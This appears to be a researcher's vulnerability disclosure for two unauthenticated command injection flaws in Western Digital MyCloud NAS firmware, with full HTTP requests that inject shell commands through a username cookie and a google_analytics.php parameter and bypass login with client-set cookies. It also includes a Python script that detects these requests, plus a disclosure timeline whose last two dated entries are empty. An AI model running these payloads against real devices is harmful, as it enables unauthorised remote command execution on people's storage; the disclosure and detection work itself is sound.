Command Injection vulnerability in Western Digital MyCloud NAS

The software version of my device is 2.11.142 and my device says that it’s up to date.

The first command injection vulnerability is in the Cookie header processed by index.php on the home page URL, “/”. To detect successful exploitation I started Wireshark and watched for the pings sent to my IP address from the device.

The request:

GET / HTTP/1.1
Host: wdmycloudex2
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 192.168.1.153`; local_login=1

I deleted the PHPSESSID from the cookie and it still worked without any authentication.

The next one was in the /web/google_analytics.php URL.

POST /web/google_analytics.php HTTP/1.1
Host: wdmycloudex2
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://wdmycloudex2/
Content-Length: 52
Cookie: isAdmin=1; username=admin; username=admin; local_login=1; fw_version=2.11.142
Connection: close

cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23

I was also able to exploit this one unauthenticated on the LAN by deleting the PHPSESSID from the cookie and replaying the request from a different computer.
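As an added example (not code from the original post, and not Western Digital's firmware), the following Python script parses the two requests quoted above and flags the indicators a defender could look for in proxy or web-server logs: URL-decoded shell metacharacters in the username cookie and in the form-encoded arg parameter, and the isAdmin/local_login cookies asserted without a PHPSESSID, which the post reports was not required for either request. The request lines and cookie/body values are copied from the post (headers trimmed to those the check uses); the benign request, the function names and the metacharacter list are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote

# Shell metacharacters that have no business in a username or a numeric setting
# (constructed list for this example).
SHELL_META = re.compile(r"[|;&`$(){}<>]")

# Cookie names taken from the quoted requests; the heuristic built on them is this example's.
AUTH_FLAG_COOKIES = ("isAdmin", "local_login")
SESSION_COOKIE = "PHPSESSID"


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.strip("\n").splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body.strip()}


def parse_cookies(header):
    """Return {name: [values]}; duplicate names are kept so every value is inspected."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies.setdefault(name, []).append(value)
    return cookies


def analyze(raw):
    """Return a list of human-readable findings for one request (empty if clean)."""
    req = parse_request(raw)
    findings = []

    cookies = parse_cookies(req["headers"].get("cookie", ""))
    for name, values in cookies.items():
        for value in values:
            decoded = unquote(value)  # %20 and friends are decoded before the server uses the value
            if SHELL_META.search(decoded):
                findings.append(f"cookie {name} contains shell metacharacters: {decoded!r}")

    # The post reports both requests succeeded with PHPSESSID deleted, so a request
    # asserting admin/login state purely through client-set cookies is suspicious.
    asserted = [c for c in AUTH_FLAG_COOKIES if c in cookies]
    if asserted and SESSION_COOKIE not in cookies:
        findings.append(f"auth cookies asserted without {SESSION_COOKIE}: {', '.join(asserted)}")

    if "application/x-www-form-urlencoded" in req["headers"].get("content-type", ""):
        for name, value in parse_qsl(req["body"], keep_blank_values=True):
            if SHELL_META.search(value):  # parse_qsl has already percent-decoded the value
                findings.append(f"body parameter {name} contains shell metacharacters: {value!r}")
    return findings


# Request 1 from the post: injection through the username cookie on "/".
REQ_INDEX = """GET / HTTP/1.1
Host: wdmycloudex2
Connection: close
Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 192.168.1.153`; local_login=1
"""

# Request 2 from the post: injection through the arg parameter of google_analytics.php.
REQ_GA = """POST /web/google_analytics.php HTTP/1.1
Host: wdmycloudex2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 52
Cookie: isAdmin=1; username=admin; username=admin; local_login=1; fw_version=2.11.142
Connection: close

cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23
"""

# Constructed benign request: a real session cookie and a plain username.
BENIGN = """GET / HTTP/1.1
Host: wdmycloudex2
Cookie: PHPSESSID=constructed0123; isAdmin=1; username=admin; local_login=1
Connection: close
"""

if __name__ == "__main__":
    for label, raw in (("index.php cookie", REQ_INDEX), ("google_analytics.php", REQ_GA), ("benign", BENIGN)):
        print(label, "->", analyze(raw) or ["clean"])
```

Both quoted requests produce two findings each (the metacharacter hit and the missing session cookie), while the benign request produces none; the same checks apply to any form-encoded request or Cookie header fed to analyze().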

I submitted the vulnerabilities to Western Digital on 10/8/2016 and received word that they released a firmware update to remediate on 12/13/2016. These vulnerabilities have been submitted to Mitre for CVE assignment.

Update 1/3/2017: Mitre assigned CVEs CVE-2016-10107 and CVE-2016-10108.

Update 1/10/2017: I received two new emails from Western Digital after the one they sent on 12/13/2016 telling me they released a firmware patch. They only patched 2016-10108.

On 12/29/2016:

On 1/9/2017:
